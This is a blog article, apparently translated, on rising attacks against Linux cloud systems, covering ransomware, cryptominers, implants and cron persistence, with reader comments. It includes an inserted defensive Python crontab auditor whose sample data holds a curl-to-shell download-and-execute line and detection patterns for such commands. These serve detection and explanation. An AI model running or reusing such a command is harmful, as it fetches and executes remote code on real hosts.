Attacks against Linux are increasing and we are not prepared

Attacks against Linux are on the rise

Years ago, Linux users made fun of Windows users for their security problems. A common joke was that the only virus we knew was the cold we caught from outdoor activities, done in the time we did not spend formatting and rebooting.

As happened to the little pigs in the story, our safety was only a feeling. As Linux made its way into the corporate world, cybercriminals found ways to get around its protections.

Why attacks against Linux are increasing

When I was collecting the items for the 2021 year-end review, I was surprised that every month there was a report on security issues related to Linux. Of course, much of the responsibility lies not with the developers but with the system administrators: most of the problems are due to poorly configured or poorly managed infrastructures.

I agree with VMware's cybersecurity researchers: cybercriminals made Linux the target of their attacks when they discovered that, in the last five years, Linux had become the most popular operating system for multi-cloud environments and is the one behind 78% of the most popular websites.

One of the problems is that most current anti-malware countermeasures focus mainly on addressing Windows-based threats.

Public and private clouds are high-value targets for cybercriminals, as they provide access to infrastructure services and critical computing resources. They host key components, such as email servers and customer databases.

These attacks work by exploiting weak authentication systems, vulnerabilities, and misconfigurations in container-based infrastructures to infiltrate the environment using remote access tools (RATs).

Once attackers have gained entry into the system, they typically opt for one of two types of attack: running ransomware or deploying cryptomining components.

  • Ransomware: In this type of attack, criminals enter a network and encrypt files.
  • Crypto mining: There are actually two types of attack. In the first, wallets are stolen by impersonating a cryptocurrency application; in the second, the hardware resources of the attacked computer are used for mining.

How the attacks are carried out

Once the criminal gains initial access to an environment, they must find a way to turn this limited access into more privileges. The first goal is to install programs on the compromised system that allow them to gain partial control of the machine.

This program, known as an implant or beacon, aims to establish regular network connections to the command and control server to receive instructions and transmit results.

There are two ways the implant can connect: passive and active.

  • Passive: The passive implant waits for the attacker to connect to the compromised server.
  • Active: The implant keeps a permanent connection to the command and control server.

Research finds that active-mode implants are the most used.

Attacker Tactics

Implants often perform reconnaissance on systems in their vicinity. For example, they can scan a whole range of IP addresses to collect system information and obtain TCP port banner data. This may also allow the implant to collect the IP addresses, host names, active user accounts, and specific operating system and software versions of every system it detects.

The implants have to be able to hide within infected systems to continue doing their job. To do so, they usually pose as just another service or application of the host operating system. In Linux-based clouds they are camouflaged as routine cron jobs. cron lets Linux, macOS, and other Unix-like environments schedule processes to run at regular intervals. In this way, the malware can be implanted in a compromised system with a run frequency of 15 minutes, so it is relaunched if it is ever killed.
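A defender can turn the cron-persistence trait described above into a simple audit. The following script is an added example, not code from the article or from VMware's report: it parses crontab lines and flags jobs that run every 15 minutes or less, that download and pipe content into a shell, or that execute from scratch directories. The crontab content, the IP address and the paths are constructed sample data.

```python
import re

# Constructed sample crontab (not from the article): two benign jobs, two with persistence traits.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update >/dev/null 2>&1
30 6 * * 1 /usr/sbin/logrotate /etc/logrotate.conf
*/15 * * * * curl -s http://198.51.100.7/k.sh | sh
*/15 * * * * /dev/shm/.x/update >/dev/null 2>&1
"""

SUSPICIOUS_PATHS = ("/tmp/", "/dev/shm/", "/var/tmp/")
DOWNLOAD_TOOLS = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")

def minutes_between_runs(minute_field):
    """Return the interval in minutes for a cron minute field, or None if it is not periodic."""
    m = re.fullmatch(r"\*/(\d+)", minute_field)
    if m:
        return int(m.group(1))
    if minute_field == "*":
        return 1
    return None

def audit_crontab(text, max_interval=15):
    """Flag entries that run at least every `max_interval` minutes, or that use
    download-and-execute or scratch-directory patterns. Returns (command, reasons) pairs."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)  # five time fields, then the command
        if len(fields) < 6:
            continue
        minute, command = fields[0], fields[5]
        reasons = []
        interval = minutes_between_runs(minute)
        if interval is not None and interval <= max_interval:
            reasons.append(f"runs every {interval} min")
        if DOWNLOAD_TOOLS.search(command):
            reasons.append("downloads and pipes to a shell")
        if any(p in command for p in SUSPICIOUS_PATHS):
            reasons.append("executes from a scratch directory")
        if reasons:
            findings.append((command, reasons))
    return findings

if __name__ == "__main__":
    for cmd, why in audit_crontab(SAMPLE_CRONTAB):
        print(f"{cmd}\n    -> {', '.join(why)}")
```

On a real host, feed it the output of `crontab -l` for each user and the contents of /etc/cron.d; the thresholds are a starting point, not a verdict, since legitimate monitoring jobs also run at short intervals.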



  1.   juancito said

    systemd + cgroups + http2 + http3 + JavaScript in PDFs… etc etc etc, and they still wonder why the problems started??

  2.   Adrian said

    As you say, you fail, or it is a very junior problem of someone who does not know how to configure a system or migrates from Windows, where it seems to be 123456 for complex systems. Linux is safe but not intelligent enough to make its own security. I think it is all one more challenge; what happens in Windows is that people feel safe for having an antivirus. It is not taught how to be safe, or how to be safe is said in a way that leaves us vulnerable, so it would be good to have an article on how to protect against these things, how to make safe signatures or use password encryption with only one… etc.

  3.   Albert said

    I think that with more popularity and more attacks, the way you shield your team also matters.